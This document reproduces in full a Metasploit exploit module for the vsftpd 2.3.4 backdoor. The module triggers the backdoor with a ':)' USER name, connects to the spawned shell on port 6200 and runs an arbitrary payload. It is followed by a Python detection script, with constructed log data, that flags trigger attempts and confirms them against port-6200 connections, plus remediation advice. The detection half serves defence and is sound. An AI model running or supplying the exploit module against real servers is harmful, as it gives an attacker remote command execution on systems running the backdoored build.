VSFTPD v2.3.4 Backdoor Command Execution Vulnerability
##
# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'VSFTPD v2.3.4 Backdoor Command Execution',
      'Description'    => %q{
          This module exploits a malicious backdoor that was added to the VSFTPD download
        archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
        June 30th 2011 and July 1st 2011 according to the most recent information
        available. This backdoor was removed on July 3rd 2011.
      },
      'Author'         => [ 'hdm', 'mc' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 13099 $',
      'References'     =>
        [
          [ 'URL', 'http://pastebin.com/AetT9sS5' ],
          [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ]
        ],
      'Privileged'     => true,
      'Platform'       => [ 'unix' ],
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 2000,
          'BadChars'    => '',
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType'    => 'cmd_interact',
              'ConnectionType' => 'find',
            },
        },
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'DisclosureDate' => 'Jul 3 2011',
      'DefaultTarget'  => 0))

    register_options([ Opt::RPORT(21) ], self.class)
  end

  def exploit

    # If the backdoor listener is already up, skip the trigger and go straight to it
    nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
    if nsock
      print_status("The port used by the backdoor bind listener is already open")
      handle_backdoor(nsock)
      return
    end

    # Connect to the FTP service port first
    connect

    banner = sock.get_once(-1, 30).to_s
    print_status("Banner: #{banner.strip}")

    # The backdoor is triggered by a USER name containing the ":)" sequence
    sock.put("USER #{rand_text_alphanumeric(rand(6)+1)}:)\r\n")
    resp = sock.get_once(-1, 30).to_s
    print_status("USER: #{resp.strip}")

    if resp =~ /^530 /
      print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
      disconnect
      return
    end

    if resp !~ /^331 /
      print_error("This server did not respond as expected: #{resp.strip}")
      disconnect
      return
    end

    sock.put("PASS #{rand_text_alphanumeric(rand(6)+1)}\r\n")

    # Do not bother reading the response from password, just try the backdoor
    nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
    if nsock
      print_good("Backdoor service has been spawned, handling...")
      handle_backdoor(nsock)
      return
    end

    disconnect

  end

  def handle_backdoor(s)

    # Sanity check: the listener on 6200 should behave like a shell
    s.put("id\n")

    r = s.get_once(-1, 5).to_s
    if r !~ /uid=/
      print_error("The service on port 6200 does not appear to be a shell")
      disconnect(s)
      return
    end

    print_good("UID: #{r.strip}")

    s.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")
    handler(s)
  end

end
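The module above shows the two observable halves of this backdoor from the network side: a USER command carrying the two-byte sequence ":)" followed by a PASS, and then a shell listening on TCP/6200 on the same host. The following detection script is an added example, not part of the original post or of the Metasploit module. It assumes a simple text FTP command log in the constructed form "<unix_ts> <client_ip> <command>" and a list of (timestamp, source_ip, destination_port) connection records; both formats, the log lines and the connection tuples are constructed for the example. It flags every ":)" USER attempt and confirms exploitation when the same client opens a connection to port 6200 shortly afterwards.

```python
"""Detect vsftpd 2.3.4 backdoor trigger attempts in FTP command logs and
confirm them against connection records (constructed example formats)."""
import re

BACKDOOR_PORT = 6200          # port the backdoored vsftpd binds a shell to
DEFAULT_WINDOW_SECONDS = 60   # how long after the USER we accept a 6200 hit

# Constructed log format: "<unix_ts> <client_ip> <ftp command line>"
LOG_LINE = re.compile(r"^(?P<ts>\d+)\s+(?P<client>\S+)\s+(?P<cmd>.*)$")
# USER argument containing ":)" anywhere (the backdoor scans the name for 0x3a 0x29)
SMILEY_USER = re.compile(r"^USER\s+(?P<user>\S*:\)\S*)\s*$")


def find_smiley_users(lines):
    """Return (timestamp, client_ip, username) for each USER whose argument contains ':)'.

    Lines that do not match the expected log format are skipped rather than
    raising, so the scanner can be pointed at a noisy log."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line.rstrip("\r\n"))
        if not m:
            continue
        u = SMILEY_USER.match(m.group("cmd"))
        if u:
            hits.append((int(m.group("ts")), m.group("client"), u.group("user")))
    return hits


def correlate_backdoor_shell(user_hits, conns, window=DEFAULT_WINDOW_SECONDS):
    """Pair each ':)' USER attempt with a later connection from the same client
    to TCP/6200 within `window` seconds. Returns (client_ip, ts_user, ts_conn)."""
    confirmed = []
    for ts, client, _user in user_hits:
        for cts, src, dport in conns:
            if src == client and dport == BACKDOOR_PORT and ts <= cts <= ts + window:
                confirmed.append((client, ts, cts))
                break
    return confirmed


def triage(ftp_lines, conns):
    """One-shot summary: every attempt, and the subset confirmed by a 6200 connection."""
    attempts = find_smiley_users(ftp_lines)
    return {
        "attempts": attempts,
        "confirmed": correlate_backdoor_shell(attempts, conns),
    }


# Constructed sample data: one normal login, one trigger followed by a 6200 connection.
FTP_LOG = [
    "1309737600 198.51.100.7 USER alice",
    "1309737601 198.51.100.7 PASS [hidden]",
    "1309737650 203.0.113.9 USER x7Ab:)",
    "1309737651 203.0.113.9 PASS q2",
    "1309737700 198.51.100.7 USER bob",
]
CONN_LOG = [
    (1309737600, "198.51.100.7", 21),
    (1309737650, "203.0.113.9", 21),
    (1309737652, "203.0.113.9", 6200),
    (1309737700, "198.51.100.7", 21),
]

if __name__ == "__main__":
    result = triage(FTP_LOG, CONN_LOG)
    for ts, client, user in result["attempts"]:
        print(f"[attempt]   {client} sent USER {user!r} at {ts}")
    for client, ts_user, ts_conn in result["confirmed"]:
        print(f"[confirmed] {client} reached port {BACKDOOR_PORT} {ts_conn - ts_user}s after the trigger")
```

A USER argument containing ":)" has essentially no legitimate use, so a single attempt is already worth an alert on its own; the 6200 correlation distinguishes a probe from a server that actually runs the backdoored build. The remediation is the one the post's description implies: verify the vsftpd source or package against the vendor's published checksums and rebuild from a clean 2.3.4 tarball.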